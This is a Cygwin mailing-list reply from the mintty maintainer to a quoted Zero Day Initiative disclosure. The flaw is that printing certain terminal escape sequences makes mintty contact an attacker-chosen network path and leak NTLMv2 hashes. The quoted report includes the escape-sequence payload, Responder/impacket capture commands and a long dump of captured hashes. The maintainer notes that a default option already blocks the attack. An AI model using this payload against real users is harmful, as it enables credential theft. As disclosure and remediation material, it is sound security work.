ZDI-CAN-24744: Mintty Path Conversion Improper Input Validation Information Disclosure Vulnerability
Thomas Wolff
towo@towo.net
Fri Aug 16 18:56:32 GMT 2024
Am 16.08.2024 um 16:25 schrieb zdi-disclosures--- via Cygwin:
> The attachment could not be scanned for viruses because it is a password protected file.
> ZDI-CAN-24744: Mintty Path Conversion Improper Input Validation Information Disclosure Vulnerability
???
> -- CVSS -----------------------------------------
>
> 5.3: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
>
> -- ABSTRACT -------------------------------------
>
> Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products:
> Mintty - Mintty
>
> -- VULNERABILITY DETAILS ------------------------
> * Version tested:3.7.1 (Git-2.45.2-64-bit.exe)
> * Installer file:Git-2.45.2-64-bit.exe
> * Platform tested:win11 23h2 [Version 10.0.22631.3593]
>
> ---
>
> ### Analysis
>
> ```
> Several escape sequences can cause the mintty process to access a file in a specific path,
> It is triggered by simply printing them out on bash, eg. \x1b]7773;//0.0.0.0/test\007
> An attacker can specify an arbitrary network path, negotiate an ntlm hash out of the victim's machine to an attacker controlled remote host.
> NetNTLMv2 hashes can be used to Pass the Hash, or password cracking using tools like hashcat or johntheripper.
>
> It's caused by an api provided by msys2.
> The api is used to convert between posix and windows paths, but it also checks for symbolic links, which is enough to trigger the vulnerability.
> The same code is forked from cygwin, so it could also be theoretically vulnerable,
>
> In the exploit, It used the escape code for setting the terminal icon OSC 7773,
> but it can be done with other escape codes as well.
> For example, there's an escape code for indicating the cwd of the shell,
> which can lead to mintty `stat`ing the directory, which is sufficient for exploitation.
> ```
>
> The following cover most of the escape codes that could be exploited:
> ```
> - OSC I / OSC 7773
> - OSC 440
> - OSC 11
> - OSC 7
> - OSC 8
> ```
Since mintty 3.7.0, option GuardNetworkPaths and its default setting
prevents this exploit.
Thomas
> The call stack is roughly the following:
> ```
> mintty:
> src/winmain.c:308 - guardpath
> src/charset.c:1104 - path_posix_to_win_w
> msys2:
> cygwin_create_path (depends on mintty's compilation flags, but it calls cygwin_conv_path regardless)
> winsup/cygwin/path.cc:3909 - cygwin_conv_path
> winsup/cygwin/path.cc:660 - path_conv::check
> ```
>
> `path_conv::check` calls several windows apis that cause a connection to a remote path to be initiated.
>
>
>
> Here is the reproduce steps.
>
> Setup an attacker vm (Linux based) and a victim vm (windows).
>
> Modify the payload for the appropriate ip address (attacker vm's ip):
>
> ```
> \x1b]7773;//0.0.0.0/test\007
> ```
>
> On the Attacker's machine run either [impacket](https://github.com/fortra/impacket)'s smbserver.py or [Responder](https://github.com/lgandx/Responder) with smb server enabled:
>
> ```
> sudo smbserver.py -ts -smb2support test .
> ```
>
> ```
> sudo ./Responder.py -I enp1s0 -v
> ```
>
> Replace `enp1s0` with the proper interface.
>
> Make sure that other smb services aren't running:
>
> ```
> systemctl status smbd.service
> systemctl status nmbd.service
> ```
>
> Print the adjusted payload from the beginning in mintty (git-bash.exe).
>
> The victim's hash should be printed by impacket or Responder.
>
>
>
>
> Here is the output from responder
> ```
> [+] Listening for events...
>
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:38cf5ca194861c7c:05F329D7F39AEFE3C744671936ABC00E:010100000000000000D29167A9CCDA0195D8F1578A8B58C30000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:331cb34ad722601a:F71C80EE1309C62CA4FF8E254A7AC1AE:010100000000000000D29167A9CCDA0142C3153183B226600000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:b5bc3a6e83c4d7d7:40218E62EF8DCA0023C166B568781059:010100000000000000D29167A9CCDA01797E79F388A237B30000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:ae5464fd841bcab6:F76567E68408F2B04E41B869711E76F8:010100000000000000D29167A9CCDA01E0A7FFF1FF381FA60000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:3bd0a49004b53416:F21B104294C18C82464FEDDC572E6231:010100000000000000D29167A9CCDA01BAAEF54AF54B72560000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:c089b70c3accfaf7:E6B708A8DA76027A16E76F79F5F24333:010100000000000000D29167A9CCDA01433CAD8EC5BCC31A0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:daa3eae276eaef28:AE4059F544451A21F5779DFB3192D9DA:010100000000000000D29167A9CCDA0110F73C1AE7035F2B0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:56c7b5b6c66d156a:96665824D373D99E5F043EFE7724BCF1:010100000000000000D29167A9CCDA012F33E5442DE0DDD40000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:44db8723d9666e80:2DAC87BC05CCECEB4BC8BFD8A9ED2317:010100000000000000D29167A9CCDA014DFB0815892812720000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:4f6f6e6df73e1d2c:884C66B57E2711811EE502E0796E8138:010100000000000000D29167A9CCDA0148213EEACAF1B7200000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:f1f9c2482522cd95:A0790CFB87DD01F4E10F57F94D487109:010100000000000000D29167A9CCDA01F1D6F8F5882213640000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:0a070bdf7688033f:C4B1F0D2CF4B23B7475AAB780FBCB685:010100000000000000D29167A9CCDA01C53624960CE78E120000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:e8f874be1a16042c:255BDD064E5A8C080FC3E0438A1D3502:010100000000000000D29167A9CCDA01F2A0B31CD1B4EB190000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:b7e3a6f69f1ba3dc:4FBC3B5E8781619637C21E21575EB522:010100000000000000D29167A9CCDA0161610316FA9D3D4E0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:9bceb9d050c9b28f:1618EE69D7DEA633EBD38C27ACC89190:010100000000000000D29167A9CCDA01D3E44752D8FA554B0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> ```
>
> procmon log
> ```
> Date: 7/8/2024 2:07:57.3678237 PM
> Thread: 4844
> Class: File System
> Operation: CreateFile
> Result: ACCESS DENIED
> Path: \\[attacker IP]\test007\
> Duration: 0.0112557
> Desired Access: Read EA, Read Attributes, Read Control
> Disposition: Open
> Options: Open Reparse Point
> Attributes: n/a
> ShareMode: Read, Write, Delete
> AllocationSize: n/a
>
> Description:
> Company:
> Name: bash.exe
> Version:
> Path: C:\Program Files\Git\usr\bin\bash.exe
> Command Line: "C:\Program Files\Git\usr\bin\bash.exe" --login -i
> PID: 6172
> Parent PID: 1844
> Session ID: 1
> User: DESKTOP-QAVUII5\wmliang
> Auth ID: 00000000:0015a222
> Architecture: 64-bit
> Virtualized: False
> Integrity: Medium
> Started: 7/8/2024 2:07:57 PM
> Ended: 7/8/2024 2:07:57 PM
> Modules:
> bash.exe 0x100400000 0x245000 C:\Program Files\Git\usr\bin\bash.exe 1/14/2024 5:25:36 AM
> msys-2.0.dll 0x210040000 0x1227000 C:\Program Files\Git\usr\bin\msys-2.0.dll Red Hat 3.4.10-87d5722901e1172a57aa4d4e3db84fbafe70d19b 2/14/2024 4:11:38 PM
>
> 0 FLTMGR.SYS FltGetStreamContext + 0x20cb 0xfffff8045abe961b C:\Windows\System32\drivers\FLTMGR.SYS
> 1 FLTMGR.SYS FltGetStreamContext + 0x1b51 0xfffff8045abe90a1 C:\Windows\System32\drivers\FLTMGR.SYS
> 2 FLTMGR.SYS FltRequestFileInfoOnCreateCompletion + 0x4ef 0xfffff8045ac21f6f C:\Windows\System32\drivers\FLTMGR.SYS
> 3 ntoskrnl.exe IofCallDriver + 0x55 0xfffff80455c29b45 C:\Windows\system32\ntoskrnl.exe
> 4 ntoskrnl.exe ProbeForWrite + 0x40fe 0xfffff8045619c8be C:\Windows\system32\ntoskrnl.exe
> 5 ntoskrnl.exe ObOpenObjectByNameEx + 0x1844 0xfffff804560cc9e4 C:\Windows\system32\ntoskrnl.exe
> 6 ntoskrnl.exe ObOpenObjectByNameEx + 0x1f2 0xfffff804560cb392 C:\Windows\system32\ntoskrnl.exe
> 7 ntoskrnl.exe NtCreateFile + 0x4c1 0xfffff80456194311 C:\Windows\system32\ntoskrnl.exe
> 8 ntoskrnl.exe NtCreateFile + 0x79 0xfffff80456193ec9 C:\Windows\system32\ntoskrnl.exe
> 9 ntoskrnl.exe setjmpex + 0x9045 0xfffff80455e2d505 C:\Windows\system32\ntoskrnl.exe
> 10 ntdll.dll NtCreateFile + 0x14 0x7ffb3fdf03f4 C:\Windows\System32\ntdll.dll
> 11 msys-2.0.dll setpassent + 0x2ff3 0x2100929c3 C:\Program Files\Git\usr\bin\msys-2.0.dll
> 12 msys-2.0.dll cygwin_split_path + 0x2c68 0x210096988 C:\Program Files\Git\usr\bin\msys-2.0.dll
> 13 msys-2.0.dll sigfillset + 0x6935 0x2100c40a5 C:\Program Files\Git\usr\bin\msys-2.0.dll
> 14 msys-2.0.dll sigfillset + 0x7f98 0x2100c5708 C:\Program Files\Git\usr\bin\msys-2.0.dll
> 15 msys-2.0.dll sigfillset + 0x9f81 0x2100c76f1 C:\Program Files\Git\usr\bin\msys-2.0.dll
> 16 msys-2.0.dll timegm + 0x4db 0x210193f2b C:\Program Files\Git\usr\bin\msys-2.0.dll
> 17 <unknown> 0x110000000 0x110000000
>
> ```
>
>
> -- CREDIT ---------------------------------------
> This vulnerability was discovered by:
> solid-snail working with Trend Micro Zero Day Initiative
>
> -- FURTHER DETAILS ------------------------------
>
> Supporting files:
>
>
> If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.
>
> Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up to the deadline, please coordinate with us so that we may release our advisory detailing the issue. If the 120-day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations, so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:
>
> Zero Day Initiative
> zdi-disclosures@trendmicro.com
>
> The PGP key used for all ZDI vendor communications is available from:
>
> http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc
>
> -- INFORMATION ABOUT THE ZDI --------------------
> Established by TippingPoint and acquired by Trend Micro, the Zero Day Initiative (ZDI) neither re-sells vulnerability details nor exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its Trend Micro TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.
>
> Please contact us for further details or refer to:
>
> http://www.zerodayinitiative.com
>
> -- DISCLOSURE POLICY ----------------------------
>
> Our vulnerability disclosure policy is available online at:
>
> http://www.zerodayinitiative.com/advisories/disclosure_policy/
>
> TREND MICRO EMAIL NOTICE
>
> The information contained in this email and any attachments is confidential and may be subject to copyright or other intellectual property protection. If you are not the intended recipient, you are not authorized to use or disclose this information, and we request that you notify us by reply mail or telephone and delete the original message from your mail system.
>
> For details about what personal information we collect and why, please see our Privacy Notice on our website at: Read privacy policy<http://www.trendmicro.com/privacy>
>
More information about the Cygwin
mailing list